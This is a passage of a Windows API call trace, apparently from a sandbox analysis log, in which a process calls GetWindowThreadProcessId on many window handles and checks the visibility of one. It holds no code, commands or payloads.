	[0961.917] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x460
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2440
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x24d8
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1aa4
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ff0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1a84
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1fb0
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e10
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x23a8
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f24
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x21ec
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2320
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1fd4
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1880
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b18
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1d6c
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x233c
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2368
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2124
	[0961.918] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x22f0
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x22ac
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1cdc
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x10f0
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f18
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x20a8
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2004
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f88
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f84
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2050
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e04
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ecc
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e64
	[0961.919] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b58
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e94
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e28
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1df8
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1da8
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1c70
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x163c
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1a10
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x186c
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1d74
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4c8
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1960
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ce4
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b24
	[0961.920] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x14e0
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x17f0
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x854
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1268
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1624
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b9c
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x16f4
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x145c
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x17d0
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1d28
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xcb8
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1190
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x3a8
	[0961.921] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1bd0
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1bfc
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1a78
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b90
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b04
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b34
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b64
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1bb0
	[0961.922] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1acc
	[0961.923] GetWindow (hWnd=0x204f6, uCmd=0x4) returned 0x0
	[0961.923] IsWindowVisible (hWnd=0x204f6) returned 0
	[0961.923] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1a2c
	[0961.923] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x19a8
	[0961.923] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1944
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x18c8
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x18ac
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x18ec
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1898
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc98
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x153c
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1808
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x12a4
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1740
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x16c4
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1820
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x16ac
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1858
	[0961.924] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1664
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x10b4
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x10ac
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x10ec
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1068
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x17e0
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x102c
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x17a4
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1050
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1694
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1770
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1720
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x165c
	[0961.925] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1578
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x16c0
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x161c
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1638
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x15c8
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1554
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1674
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1520
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x14bc
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xf8c
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe9c
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1434
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x14ec
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xfcc
	[0961.926] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x12ac
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1484
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x934
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc0c
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xb08
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x948
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1178
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x13e0
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xcd0
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x13fc
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xdc8
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc18
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc2c
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa1c
	[0961.927] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1244
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xdb0
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1398
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1358
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1370
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1340
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x130c
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x12c0
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x12e4
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1270
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1298
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x120c
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x122c
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x11c4
	[0961.928] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x11b0
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1188
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1148
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1160
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x10fc
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe34
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xea4
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x514
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe48
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xbc8
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xdf8
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x318
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xcac
	[0961.929] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x8bc
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xf9c
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xf48
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe40
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xecc
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xeb8
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe80
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe98
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe60
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xee4
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xf00
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xdf0
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xe1c
	[0961.930] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xdd0
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xd94
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xd74
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xd00
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xcd8
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc84
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xca4
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc64
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc24
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xb84
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xbac
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x384
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xab8
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x33c
	[0961.931] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa44
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa64
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x8a8
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xaf0
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x88c
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xb04
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x910
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x230
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xac0
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xab4
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xaac
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x3d0
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x978
	[0961.932] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa7c
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x59c
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa88
